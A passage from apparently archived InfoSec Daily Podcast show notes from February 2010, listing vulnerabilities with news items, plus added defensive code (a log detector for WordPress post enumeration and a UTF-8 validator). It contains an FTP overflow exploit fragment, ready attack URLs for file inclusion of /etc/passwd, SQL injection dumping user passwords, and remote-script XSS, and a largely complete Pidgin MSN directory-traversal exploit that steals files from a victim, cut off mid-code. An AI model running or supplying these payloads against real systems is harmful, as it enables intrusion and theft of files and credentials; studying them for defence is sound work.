    s.recv(1024)
    s.send('MKD ' + evil + '\r\n')
    s.recv(1024)
    s.send('QUIT\r\n')
    s.close()

  3. Apache Tomcat is subject to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input.  Exploiting this issue allows attackers to delete arbitrary files within the context of the current working directory.  The following versions are affected: Tomcat 5.5.0 through 5.5.28 and Tomcat 6.0.0 through 6.0.20.  An attacker can exploit this issue by deploying a malicious WAR file.
  4. FUSE (Filesystem in Userspace) is subject to a race-condition vulnerability.  A local attacker can exploit this issue to cause a denial of service via symlink attacks involving FUSE shares belonging to privileged users. NOTE: For an exploit to succeed, the attacker must be a member of the ‘fuse’ group. Attackers can use standard commands to exploit this issue.
  5. Todd Miller ‘sudo’ is subject to a local privilege-escalation vulnerability because it fails to correctly handle the ‘sudoedit’ command. Local attackers could exploit this issue to run arbitrary commands as the ‘root’ user. Successful exploits can completely compromise an affected computer. This issue affects ‘sudo’ 1.6.9 through 1.7.2p3.  Local attackers can use readily available commands to exploit this issue.
  6. The Core Design Scriptegrator component for Joomla! is subject to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. Example URL:  http://www.sample.com/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd
  7. PHP is subject to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. NOTE: In some configurations, attackers may exploit this issue to carry out HTML-injection attacks. Versions prior to PHP 5.2.12 are vulnerable. PHP code is available:
    <?php
    // each string contains a byte sequence that is not valid in the named encoding
    // overlong UTF-8 sequence
    echo htmlspecialchars("A\xC0\xAF&", ENT_QUOTES, 'UTF-8');
    // invalid Shift_JIS sequence
    echo htmlspecialchars("B\x80&", ENT_QUOTES, 'Shift_JIS');
    echo htmlspecialchars("C\x81\x7f&", ENT_QUOTES, 'Shift_JIS');
    // invalid EUC-JP sequence
    echo htmlspecialchars("D\x80&", ENT_QUOTES, 'EUC-JP');
    echo htmlspecialchars("E\xA1\xFF&", ENT_QUOTES, 'EUC-JP');
    echo htmlspecialchars("F\x8E\xFF&", ENT_QUOTES, 'EUC-JP');
    echo htmlspecialchars("G\x8F\xA1\xFF&", ENT_QUOTES, 'EUC-JP');
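
The WordPress PoC in item 1 leaves a distinctive trace in a web server's access log: one client walks /?p=0, /?p=1, /?p=2 and so on, fetching each id twice (once without and once with the login cookie). The detector below is an added example, not code from the podcast or from the researchers; it parses combined-format access-log lines and flags any client that requested a run of consecutive post ids. The log lines are constructed sample data, and the run threshold of five is an assumption to tune for the site.

```python
import re
from collections import defaultdict

# Apache/nginx "combined" access-log layout; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
POST_ID_RE = re.compile(r"^/\?p=(\d+)$")


def post_ids_by_client(lines):
    """Return {client_ip: [post ids in request order]} for every /?p=N request."""
    per_ip = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        p = POST_ID_RE.match(m.group("path"))
        if p is not None:
            per_ip[m.group("ip")].append(int(p.group(1)))
    return per_ip


def find_post_enumeration(lines, min_run=5):
    """Flag clients that walked at least min_run consecutive post ids.

    Repeated requests for the same id are collapsed first, because the PoC
    fetches every id twice (once anonymously, once with the session cookie).
    Returns {client_ip: (first_id, last_id)} for the longest qualifying run.
    """
    alerts = {}
    for ip, ids in post_ids_by_client(lines).items():
        unique = [i for n, i in enumerate(ids) if n == 0 or i != ids[n - 1]]
        best, run_start, run_len = None, unique[0], 1
        for prev, cur in zip(unique, unique[1:]):
            if cur == prev + 1:
                run_len += 1
            else:
                run_start, run_len = cur, 1
            if run_len >= min_run and (best is None or run_len > best[2]):
                best = (run_start, cur, run_len)
        if best is not None:
            alerts[ip] = (best[0], best[1])
    return alerts


# Constructed sample log: 10.0.0.5 behaves like the PoC (ids 0..6, each fetched
# twice), while 192.0.2.44 is an ordinary visitor.
SAMPLE_LOG = []
for _id in range(7):
    SAMPLE_LOG += [
        '10.0.0.5 - - [24/Feb/2010:10:15:%02d +0000] "GET /?p=%d HTTP/1.1" 404 512 "-" "python-httplib"' % (_id, _id),
        '10.0.0.5 - - [24/Feb/2010:10:15:%02d +0000] "GET /?p=%d HTTP/1.1" 200 2048 "-" "python-httplib"' % (_id, _id),
    ]
SAMPLE_LOG += [
    '192.0.2.44 - - [24/Feb/2010:10:16:01 +0000] "GET /?p=12 HTTP/1.1" 200 3072 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [24/Feb/2010:10:16:09 +0000] "GET /about/ HTTP/1.1" 200 2800 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(find_post_enumeration(SAMPLE_LOG))
```

Sequential id walks are also what legitimate crawlers produce, so in practice the alert is best combined with the request rate and with the paired cookie/no-cookie pattern; the detection is a prompt to look, while the fix is the WordPress 2.9.2 upgrade named in the advisory.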

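The PHP test strings in item 7 are malformed multibyte sequences: \xC0\xAF is an overlong encoding of "/" that a lenient decoder accepts and a strict one must reject. The code below is an added example, not code from the podcast or from the PHP project; it shows in Python what "overlong" means, implements the RFC 3629 well-formedness table so each bad offset in the advisory's first string is reported, and shows the hardened escaping pattern of validating the encoding before the characters are escaped. The sample input is the advisory's own string; the helper names are this example's.

```python
import html


def find_invalid_utf8(raw):
    """Return byte offsets at which raw (bytes) is not well-formed UTF-8.

    Implements the RFC 3629 table directly so that overlong forms (lead bytes
    C0/C1, E0 followed by 80..9F, F0 followed by 80..8F), surrogates and
    stray continuation bytes are all reported. After an error the scan
    resumes at the next byte.
    """
    bad, i, n = [], 0, len(raw)
    while i < n:
        b = raw[i]
        if b < 0x80:
            i += 1
            continue
        if 0xC2 <= b <= 0xDF:
            need, lo, hi = 1, 0x80, 0xBF
        elif b == 0xE0:
            need, lo, hi = 2, 0xA0, 0xBF   # 80..9F here would be overlong
        elif 0xE1 <= b <= 0xEC or 0xEE <= b <= 0xEF:
            need, lo, hi = 2, 0x80, 0xBF
        elif b == 0xED:
            need, lo, hi = 2, 0x80, 0x9F   # A0..BF here would encode surrogates
        elif b == 0xF0:
            need, lo, hi = 3, 0x90, 0xBF   # 80..8F here would be overlong
        elif 0xF1 <= b <= 0xF3:
            need, lo, hi = 3, 0x80, 0xBF
        elif b == 0xF4:
            need, lo, hi = 3, 0x80, 0x8F   # above 8F exceeds U+10FFFF
        else:
            bad.append(i)                  # 80..C1 or F5..FF can never start a sequence
            i += 1
            continue
        tail = raw[i + 1:i + 1 + need]
        ok = (len(tail) == need and lo <= tail[0] <= hi
              and all(0x80 <= t <= 0xBF for t in tail[1:]))
        if not ok:
            bad.append(i)
            i += 1
        else:
            i += need + 1
    return bad


def lenient_two_byte_value(lead, cont):
    """Code point a non-validating decoder would produce for a 2-byte sequence.

    Shows why C0 AF matters: it decodes to 0x2F, '/', so a filter that looked
    for the literal byte 0x2F never saw it, while the consumer did.
    """
    return ((lead & 0x1F) << 6) | (cont & 0x3F)


def escape_html_strict(raw, encoding="utf-8"):
    """Decode with malformed bytes replaced by U+FFFD, then escape for HTML.

    Undecodable bytes therefore never reach the output, which removes the
    condition the advisory describes: an escaper passing through bytes it
    could not interpret.
    """
    return html.escape(raw.decode(encoding, errors="replace"), quote=True)


if __name__ == "__main__":
    sample = b"A\xc0\xaf&"   # the advisory's first test string
    print(find_invalid_utf8(sample), hex(lenient_two_byte_value(0xC0, 0xAF)))
    print(escape_html_strict(sample))
```

Replacing with U+FFFD is the forgiving choice; rejecting the request outright is equally valid and is simpler to reason about when the input should never have contained non-UTF-8 bytes in the first place.
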
News Items of Interest:
News item 1: http://www.pcadvisor.co.uk/news/index.cfm?RSS&NewsID=3213469

Intel was targeted by “sophisticated” attacks last month, about the same time that Google reported its network had been breached, allegedly by Chinese hackers.

In its annual report filed on Monday with the US Securities and Exchange Commission (SEC), Intel confirmed that it had been hit in January.

“We regularly face attempts by others to gain unauthorised access through the internet to our information technology systems by, for example, masquerading as authorised users or surreptitious introduction of software,” read the report. “These attempts, which might be the result of industrial or other espionage, or actions by hackers seeking to harm the company, its products, or end users, are sometimes successful. One recent and sophisticated incident occurred in January 2010 around the same time as the recently publicised security incident reported by Google.”

Intel did not reveal whether the attacks had accessed or stolen confidential company information, an admission that Google made last month when it broke the news that it, and other major Western corporations, had been struck by what it called “highly sophisticated and targeted” attacks.

News item 2: http://www.adobe.com/support/security/bulletins/apsb10-08.html

Adobe has fixed a critical vulnerability in Download Manager for the second time in six weeks.  The program is used to download the company’s two most popular products, Adobe Reader and Flash Player.  The bug, Adobe acknowledged in an advisory, “potentially allow[s] an attacker to download and install unauthorised software onto a user’s system”.

Israeli security researcher Aviv Raff disclosed the vulnerability last week, when he said that attackers could use the Download Manager to forcibly download and install any executable file, including attack code.

“If you go to Adobe’s website to install a security update for Flash, you really expose yourself to a zero-day attack,” Raff said.

Download Manager is not the update mechanism for Reader and Flash Player – that’s called Adobe Updater – but instead oversees file transfers from Adobe’s site.

News item 3: http://news.bbc.co.uk/2/hi/business/8533551.stm
The European Commission is looking into complaints about Google’s behaviour, the company has revealed.  The complaints were made by UK price comparison site Foundem, French legal search engine ejustice.fr, and Microsoft’s Ciao.  Google’s senior competition lawyer Julia Holtz said the internet giant was “confident” it operated within European competition law.  Foundem claims that its site is demoted in Google’s search results.  “Foundem… argues that our algorithms demote their site in our results because they are a vertical search engine and so a direct competitor to Google,” Google said.

Foundem founder Shivaun Raff said its problems with Google’s rankings were resolved in December 2009, but it was filing the complaint on behalf of other search firms.

News item 4: http://www.scribd.com/doc/25550091/Proj-Grey-Goose-report-on-Critical-Infrastructure-Attacks-Actors-and-Emerging-Threats
According to Kelly Jackson Higgins, attacks against the power grid are likely to rise and intensify during the next 12 months as smart grid research and pilot projects advance, according to utility security experts and a recently published report that analyzes threats to critical infrastructure.

The so-called Project Grey Goose Report on Critical Infrastructure points to state and/or non-state sponsored hackers from the Russian Federation of Independent States, Turkey, and China as the main threats to targeting and hacking into energy providers and other critical infrastructure networks.

Jeffrey Carr, principal investigator for Project Grey Goose and founder and CEO of GreyLogic, says he and other researchers working on the report initially focused on answering the question of whether there have been any successful cyberattacks on the utilities. “Some companies say there’s never been a successful attack against the grid, but that’s not true,” he says. “There have been at least 120 instances” of successful attacks, some of which are documented in the report and date back to 2001.

Several utility security experts agree that utility security administrators will have their hands full during the next year, as the transition from isolated, closed energy-generation and transmission networks to IP-based and wireless ones begins to take shape in the form of pilot smart grid projects.

News item 5: http://www.scmagazineus.com/ftc-notifies-100-organizations-about-p2p-leaks/article/164288/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+SCMagazineNews+%28SC+Magazine+News%29

The Federal Trade Commission (FTC) said it has identified widespread data leaks from businesses, schools and local governments on peer-to-peer (P2P) file-sharing networks.
As a consequence, the FTC recently alerted nearly 100 organizations whose sensitive information, including personal data about customers and employees, is currently residing on P2P networks. The notices were sent to both private and public organizations ranging in size from eight to tens of thousands of employees.

FTC Chairman Jon Leibowitz said in a statement: “For example, we found health-related information, financial records and drivers’ license and Social Security numbers — the kind of information that could lead to identity theft.” The FTC also released educational materials for businesses about the risks of P2P networks and ways to manage them.

News item 6: http://news.cnet.com/8301-13579_3-10457460-37.html?part=rss&subj=news&tag=2547-1_3-0-20
Apple notified developer Chillifresh that its Wobble iBoobs application was being removed from the App Store due to its “overtly sexual” nature. Since then, it appears that Apple has gone on a rampage of sex-oriented app removals.

Chillifresh claimed in a Saturday post that a discussion with Apple revealed that more than 5,000 apps have been affected by its new App Store content policy. Apple said the change was triggered by numerous customer complaints, according to Chillifresh.

Data from iPhone app-tracking Web site AppShopper supports the claim. AppShopper sister site MacRumors on Sunday reported that app removals went from about 100 a day to a high of almost 4,000 on Friday.
Chillifresh said on its Web site that an Apple representative told the developer that under its new App Store policy, it will not accept applications that in any way imply sexual content or include the following:
* images of women in bikinis
* images of men in bikinis
* images of skin
* silhouettes indicating that the app includes sexual images
* sexual connotations or innuendo
* sexually arousing content
Interestingly, some apps that include sexual content, such as Playboy’s, seem to have been missed by the recent purge, so far at least. Doing a search for “girls” on the App Store will bring up a variety of apps with bikini-clad women and others that appear to break the new rules Chillifresh said Apple outlined.

2010
02.23

Episode 73 – N1H1

InfoSec Daily Podcast

 
ISD Podcast Episode 73 for February 23, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:

Vulnerabilities of Interest:

  1. The Linux kernel is subject to a RTO (Retransmission Timeouts) Remote Denial of Service Vulnerability.  Attackers can exploit this issue to cause an excessive load on CPU and network resources, denying service to legitimate users. Attackers can use readily available network utilities to exploit this issue.
  2. WSC CMS is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Attackers can use a browser to exploit this issue. The following example is available:
    1- http://www.sample.com/public/backoffice
    2- login with "admin" as user name and 'or' as password
  3. Gretech GOM Player is subject to a remote buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input. Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions. GOM Player 2.1.21.4846 is vulnerable; other versions may also be affected.
  4. Konversation IRC is subject to a remote denial-of-service vulnerability. An attacker may exploit this issue to crash the application, resulting in a denial-of-service condition. Versions prior to Konversation 1.2.3 are vulnerable. An attacker can use readily available network utilities to exploit this issue.
  5. vBseo is subject to a local file-include vulnerability. Version 3.1.0 is vulnerable, though other versions may be affected. Exploit code is available: http://www.sample.com/[path]/vbseo.php?vbseoembedd=1&vbseourl=[LFI]
  6. Official Portal 2007 is subject to multiple vulnerabilities, including SQL injection and cross-site scripting. Google Dork: “Official Portal 2007”. Exploit code is available. SQL injection: http://www.sample.com/?fa=content.detail&id=-72+union+select+1,concat_ws%280x3a,userid,username,pwd%29,3,4,5,6,7,8,9,10,11+from+tuser--
    Cross-site scripting: http://www.sample.com/?fa=<SCRIPT/SRC="http://site.com/xss.js"></SCRIPT>

News Items of Interest:

News item 1:  http://gcn.com/articles/2010/02/19/nist-crypto-docs-021910.aspx

The National Institute of Standards and Technology has released two documents as part of its Cryptographic Key Management Project — a summary of a key management workshop held in June that explored the risks and challenges of handling cryptographic keys in new technological environments, and a draft of recommendations for agencies on transitioning to new algorithms and keys.

Key management is one of the most difficult tasks in cryptography, because a cryptographic algorithm or scheme is only as secure as the keys used to encrypt and decrypt data. The scalability and usability of the methods used to distribute keys are of particular concern. NIST’s key management project is an effort to improve the overall key management strategies to enhance the usability of cryptographic technology, provide scalability and support a global cryptographic key management infrastructure.

The first step in achieving those goals was a workshop NIST hosted in June that examined the obstacles in using the key management methodologies currently in use. It also covered alternative technologies that key management needs to accommodate and approaches for moving from current methodologies to more desirable methods.

The results of the workshop are summarized in NIST Interagency Report 7609. An approach to transitioning to new generations of keys and algorithms is provided in a draft of Special Publication 800-131, “Recommendation for the Transitioning of Cryptographic Algorithms and Key Sizes.”

News item 2: http://www.tzi.de/~edelkamp/secart

SECART – Second International Workshop on Security and Artificial Intelligence, Atlanta, Georgia, July 11, 2010. Workshop themes include both applied and theoretical results regarding the application of AI techniques to security problems (or, alternatively, novel security issues caused by the use of AI techniques). Possible topics include but are not limited to the following:

*  Knowledge Representation and Engineering for Cyber Security

*  Secure Web Services

*  Development of Trusted Software

*  Data Mining and Forensics

*  Automated Vulnerability Analysis

*  Automated Exploit and Attack Generation

*  Automated Alerting and Response

*  Diagnosis and Plan Recognition

*  Automating Security Analyses and Audits

*  Artificial Immune Systems

*  Privacy and Confidentiality

*  Intelligent User Interfaces for Security Applications

*  Security and Organizational Structure

WORKSHOP ORGANISERS

Chairs:

Mark Boddy

Adventium Labs

Minneapolis, USA

mark.boddy@adventiumlabs.org

Stefan Edelkamp

TZI

University Bremen, Germany

edelkamp@tzi.de

Robert P. Goldman

SIFT, LLC

Minneapolis, USA

rpgoldman@sift.info

Program Committee:

Lee Badger (NIST, US)

Bob Balzer (Teknowledge, US)

Mark Boddy (Adventium Labs, US)

Cas Cremers (ETH, Switzerland)

Stefan Edelkamp (U Bremen, G)

Chris Geib (U Edinburgh, GB)

Robert P. Goldman (SIFT, US)

Rachel Greenstadt (Drexel U, US)

Henry Kautz (U of Rochester, US)

Alessio Lomuscio (IC London, GB)

Norbert Pohlmann (IF(IS), G)

Anil Somayaji (Carleton U, CA)

Shannon Spires (Sandia Labs, US)

Tim Strayer (BBN Technologies, US)

Karsten Sohr (TZI Bremen, G)

Dan Thomsen (SIFT and CDA, US)

Luca Vigano (U Verona, I)

Yacine Zemali (LIFO, FR)

Deadline for submissions:   March 29, 2010

Notification of acceptance: April 15, 2010

Final versions due:         May 4, 2010

Articles of up to 8 pages in AAAI plain article style should be submitted in PDF format to the EasyChair system (https://www.easychair.org/login.cgi?conf=secart10) by the March 29, 2010 deadline.

Attendance fees will be posted as they become available from AAAI. In the past, AAAI has permitted workshop-only registrations. SECART is affiliated with AAAI-10.

News item 3: http://www.dailymail.co.uk/news/worldnews/article-1252738/Argentinian-hackers-plaster-countrys-flag-Falklands-newspaper-website-new-conflict-begins.html

Argentinian hackers drew first blood in the latest Falklands stand-off by plastering the country’s flag across the islands’ newspaper website.

The computer attack came as a British oil rig was set to begin searching for oil after arriving in the South Atlantic waters from Scotland.

The Argentine activists hacked into the English-language Penguin News to post a flag on the home page and an audio recording of the song “March of the Malvinas,” Argentina’s name for the Falklands.

They also wrote ‘the islands are Argentine’ and claimed the move was a ‘tribute’ to the country’s soldiers who died during the Falklands War.

The material has now been removed.

News item 4: http://twitter.com/th3j35t3r
Infamous patriot hacker The Jester (th3j35t3r) has released a video demonstration of the XerXeS DoS attack as it is unleashed on the Taliban website www.alemarah.com.

The video release follows an earlier announcement that The Jester has been working to improve and automate aspects of the attack method, which, unlike a DDoS attack, requires only one low-spec machine to implement.

The Jester is always quick to point out his claim that his attacks produce absolutely no permanent damage to the target site, or any intermediary nodes.

2010
02.22

InfoSec Daily Podcast

 
ISD Podcast Episode 72 for February 22, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:

MyHardDriveDied.com will be putting on their SANS version of the Data Recovery Class in Orlando at SANS 2010 March 8th to 12th. https://www.sans.org/registration/register.php?conferenceid=2191

Data Recovery Class April 12th to the 16th in Washington DC: go to MyHardDriveDied.com or email smoulton at nicservices dot com for more information.

The next dc404 meeting will be at Outerzone near the Atlanta airport. Here’s their site for more info: http://www.outerz0ne.org/

March 15 – 20, 2010 SANS Audit 507: Auditing Networks, Perimeter and Systems  (http://www.sans.org/atlanta-auditing-networks-perimeters-2010-cs)
April 15 – 21, 2010  SANS Mgmt 512: Security Leadership Essentials for Managers with Knowledge Compression (TM) (http://www.sans.org/atlanta-security-leadership-2010-cs)
May 17 – 21, 2010  SANS Security 566:  Implementing and Auditing the Twenty Critical Security Controls – In Depth  (http://www.sans.org/atlanta-critical-controls-2010-cs)

Vulnerabilities of Interest:

  1. Libpurple is subject to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks. Versions prior to Libpurple 2.6.5 are vulnerable.
    #!/usr/bin/env python
    """
    Pidgin MSN <= 2.6.4 file download vulnerability
    Mathieu GASPARD (gaspmat@gmail.com)

    Description:
    Pidgin is a multi-protocol Instant Messenger.

    This is an exploit for the vulnerability[1] discovered in Pidgin by Fabian Yamaguchi.
    The issue is caused by an error in the MSN custom smiley feature when processing emoticon requests,
    which could allow attackers to disclose the contents of arbitrary files via directory traversal attacks.

    Affected versions :
    Pidgin <= 2.6.4, Adium and other IM using Pidgin-libpurple/libmsn library.
    Plugin msn-pecan 0.1.0-rc2  (http://code.google.com/p/msn-pecan/) IS also vulnerable even if Pidgin is up to date

    Plateforms :
    Windows, Linux, Mac

    Fix :
    Fixed in Pidgin 2.6.5
    Update to the latest version : http://www.pidgin.im/download/

    References :
    [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0013
    [2] http://www.pidgin.im/news/security/?id=42

    Usage :
    You need the Python MSN Messenger library : http://telepathy.freedesktop.org/wiki/Pymsn
    python pidgin_exploit.py -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE [-o OUTPUT_FILE] [-l]

    Example :
    # python pidgin_exploit.py -a foo@hotmail.com -c victim@hotmail.com -f ../accounts.xml [-o accounts.xml]

    ***********************************************************

    Pidgin MSN file download vulnerability (CVE-2010-0013)

    Usage: %prog -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE_REQUESTED [-o DESTINATION_FILE] [-l]

    ***********************************************************

    Please enter the password for the account "foo@hotmail.com"
    Password:
    [+] Connecting to server
    [+] Authentication in progress
    [+] Synchronisation in progress
    [+] OK, all done, ready to proceed
    [+] Sending request for file "../accounts.xml" to "victim@hotmail.com"
    [+] Using session_id 974948028
    Current : 3606, total: 3881  (92%)
    [+] Got an answer from the contact
    ----------------
    <?xml version='1.0' encoding='UTF-8' ?>

    <account version='1.0'>
    ........
    """

    import warnings
    warnings.simplefilter("ignore", DeprecationWarning)
    import os
    import sys
    try:
        import pymsn
    except ImportError:
        print "Pymsn couldn't be loaded"
        print "On debian-like systems, the package is python-msn"
        sys.exit(-1)
    import gobject
    import logging
    import getpass
    import hashlib
    from optparse import OptionParser
    import signal
    import time

    SERVER_ADDRESS = 'messenger.hotmail.com'
    SERVER_PORT = 1863
    FD_OUT = sys.stdout
    MAINLOOP = None
    # seconds after which, if we didn't get an answer, we quit
    TIMEOUT = 5

    global_client = None


    def quit():
        MAINLOOP.quit()
        sys.exit(0)


    def check_if_succeeds():
        # if False, we didn't get a chunk so we won't get any file, so we quit
        if global_client.GOT_CONTROL_BLOB == False:
            print "[+] Didn't get an answer from the client after %d seconds, it's likely not vulnerable or the file requested doesn't exist/is not accessible" % TIMEOUT
            print "[+] Exiting"
            global_client.quit()


    # called when we get the result data, after our request
    def handle_answer(object, client):
        print "\n[+] Got an answer from the contact"
        d = object._data
        data = d.read()
        length = len(data)
        FD_OUT.write(data)
        # if we wrote output to stdout, don't close it
        if FD_OUT != sys.stdout:
            FD_OUT.close()
            print "[+] Wrote %d bytes to file" % length
        client.end = time.time()
        duration = client.end - client.begin
        print "[+] Download lasted %d seconds at %d bytes/s " % (duration, (length / duration))
        client.quit()


    def my_on_chunk_recv(transport, chunk):
        global_client._p2p_session_manager._transport_manager._on_chunk_received_OLD(transport, chunk)
        session_id = chunk.header.session_id
        blob_id = chunk.header.blob_id
        if session_id == global_client.session_id:
            # first blob is control, we "squeeze" it and keep only the second one
            if global_client.GOT_CONTROL_BLOB == False:
                #print "Got Control blob in our connection (session_id : %d, blob_id: %d)" % (session_id, blob_id)
                global_client.GOT_CONTROL_BLOB = True
            else:
                # if connection is complete, session_id is removed from data_blobs so we have to check before accessing it
                if global_client._p2p_session_manager._transport_manager._data_blobs.has_key(session_id):
                    current_blob = global_client._p2p_session_manager._transport_manager._data_blobs[session_id]
                    print "Current : %d, total: %d  (%d%%)\r" % (current_blob.current_size, current_blob.total_size, ((current_blob.current_size * 100) / current_blob.total_size)),
                    sys.stdout.flush()


    def error_handler(self, error_type, error):
        # __on_user_invitation_failed, probably because contact is offline/invisible
        if error_type == pymsn.event.ConversationErrorType.CONTACT_INVITE and \
           error == pymsn.event.ContactInviteError.NOT_AVAILABLE:
            print "[*] ERROR, contact didn't accept our invite, probably because it is disconnected/invisible"
            quit()
        # __on_message_undelivered, probably because contact is offline/invisible
        if error_type == pymsn.event.ConversationErrorType.MESSAGE and \
           error == pymsn.event.MessageError.DELIVERY_FAILED:
            print "[*] ERROR, couldn't send message, probably because contact is disconnected/invisible"
            quit()
        print "[*] Unhandled error, error_type : %d , error : %d" % (error_type, error)
        quit()


    class MyClient(pymsn.Client):
        def __init__(self, server, quit, victim, filename, list_only, proxies={}, transport_class=pymsn.transport.DirectConnection):
            # callback to quit
            self.quit = quit
            # victim from whom we request the file
            self.victim = victim
            # just list contacts for this account
            self.list_only = list_only
            # file we request
            self.filename = filename
            # to calculate download duration and speed
            self.begin = 0
            self.end = 0
            # session_id of the connection to retrieve the file
            self.session_id = 0
            # have we already seen the "control blob" for this connection
            self.GOT_CONTROL_BLOB = False
            pymsn.Client.__init__(self, server)
            # REALLY REALLY HACKISH
            # if contact is disconnected/invisible, a "NotImplementedError" exception is raised
            # and it can't be caught AFAIK so it needs to be redefined here
            # handler_class should be SwitchboardClient
            for handler_class, extra_args in self._switchboard_manager._handlers_class:
                handler_class._on_error = error_handler


    class MyMSNObjectStore(pymsn.p2p.MSNObjectStore):
        def __compute_data_hash(self, data):
            digest = hashlib.sha1()
            data.seek(0, 0)
            read_data = data.read(1024)
            while len(read_data) > 0:
                digest.update(read_data)
                read_data = data.read(1024)
            data.seek(0, 0)
            return digest.digest()

        # need to compute the SHA hash (SHAd in MSNObject) otherwise the function in MSNObjectStore complains because
        # the hash of the data we receive is not the hash we expected (hash we expect is the one we send, which is always the same here)
        def _outgoing_session_transfer_completed(self, session, data):
            handle_id, callback, errback, msn_object = self._outgoing_sessions[session]
            msn_object._data_sha = self.__compute_data_hash(data)
            super(MyMSNObjectStore, self)._outgoing_session_transfer_completed(session, data)


    class ClientEventHandler(pymsn.event.ClientEventInterface):

        def on_client_error(self, error_type, error):
            if error_type == pymsn.event.ClientErrorType.AUTHENTICATION:
                print "[+] Authentication failed, bad login/password"
                self._client.quit()
            else:
                print "[*] ERROR :", error_type, " ->", error

        def on_client_state_changed(self, state):
            #print "State changed to %s" % state
            if state == pymsn.client.ClientState.CLOSED:
                print "[+] Connection to server closed"
                self._client.quit()

            if state == pymsn.client.ClientState.CONNECTING:
                if self.current_state != state:
                    print "[+] Connecting to server"
                    self.current_state = state
            if state == pymsn.client.ClientState.AUTHENTICATING:
                if self.current_state != state:
                    print "[+] Authentication in progress"
                    self.current_state = state
            if state == pymsn.client.ClientState.SYNCHRONIZING:
                if self.current_state != state:
                    print "[+] Synchronisation in progress"
                    self.current_state = state

            if state == pymsn.client.ClientState.OPEN:
                print "[+] OK, all done, ready to proceed"
                self._client.profile.presence = pymsn.Presence.INVISIBLE
                contact_dict = {}
                for i in self._client.address_book.contacts:
                    contact_dict[i.account] = i
                if self._client.list_only:
                    for (k, v) in contact_dict.items():
                        print k + " (" + v.display_name + ")"
                    self._client.quit()
                else:
                    if self._client.victim not in contact_dict.keys():
                        print "[*] Error, contact %s not in your contact list" % self._client.victim
                        self._client.quit()
                    else:
                        contact = contact_dict[self._client.victim]
                        store = MyMSNObjectStore(self._client)
                        object = pymsn.p2p.MSNObject(contact, 65535, pymsn.p2p.MSNObjectType.CUSTOM_EMOTICON, self._client.filename, 'AAA=', '2jmj7l5rSw0yVb/vlWAYkK/YBwk=')
                        print "[+] Sending request for file \"%s\" to \"%s\"" % (self._client.filename, self._client.victim)
                        self._client.begin = time.time()
                        store.request(object, [handle_answer, self._client])
                        # at this moment, we got only one session_id, the one we will use to request the file
                        for k in store._outgoing_sessions.keys():
                            print "[+] Using session_id %d" % k._id
                            self._client.session_id = k._id
                        # hack to set up my own callback each time we receive a chunk, used to print the percentage of the download
                        self._client._p2p_session_manager._transport_manager._on_chunk_received_OLD = self._client._p2p_session_manager._transport_manager._on_chunk_received
                        self._client._p2p_session_manager._transport_manager._on_chunk_received = my_on_chunk_recv
                        # if no file transfer received from the victim after TIMEOUT seconds, quit
                        gobject.timeout_add(TIMEOUT * 1000, check_if_succeeds)

        def __init__(self, client):
            self.current_state = None
            pymsn.event.ClientEventInterface.__init__(self, client)


    if __name__ == '__main__':
        print "***********************************************************\n"
        print "Pidgin MSN file download vulnerability (CVE-2010-0013)\n"
        print "Usage: %prog -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE_REQUESTED [-o DESTINATION_FILE] [-l]\n"
        print "***********************************************************\n"

        usage = "Usage: %prog -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE_REQUESTED [-o DESTINATION_FILE] [-l] "
        parser = OptionParser(usage=usage)
        parser.add_option("-f", "--file", dest="filename", default=None,
                          help="File requested to remote contact")
        parser.add_option("-o", "--output", dest="output_file", default=None,
                          help="Where to write received file, STDOUT otherwise")
        parser.add_option("-a", "--account", dest="account", default=None,
                          help="MSN account to use")
        parser.add_option("-c", "--contact", dest="contact", default=None,
                          help="Contact to request file from")
        parser.add_option("-l", "--list", dest="list_only", action="store_true", default=False,
                          help="Just print contact list for your account and exit")

        (options, args) = parser.parse_args()
        if not options.filename or not options.account or not options.contact:
            if not (options.account and options.list_only):
                print "Error, parameter missing"
                parser.print_help()
                sys.exit(-1)

        if options.output_file != None:
            try:
                FD_OUT = open(options.output_file, "wb")
            except Exception, e:
                print "Cannot open file %s (%s)" % (options.output_file, e)
                sys.exit(-1)

        MAINLOOP = gobject.MainLoop()

        # signal handlers receive (signum, frame); the original omitted them
        def sigterm_cb(signum, frame):
            gobject.idle_add(quit)

        signal.signal(signal.SIGTERM, sigterm_cb)

        logging.basicConfig(level=logging.CRITICAL)  # allows us to see the protocol debug
        server = (SERVER_ADDRESS, SERVER_PORT)
        client = MyClient(server, quit, options.contact, options.filename, options.list_only)
        global_client = client
        client_events_handler = ClientEventHandler(client)
        print "Please enter the password for the account \"%s\"" % options.account
        try:
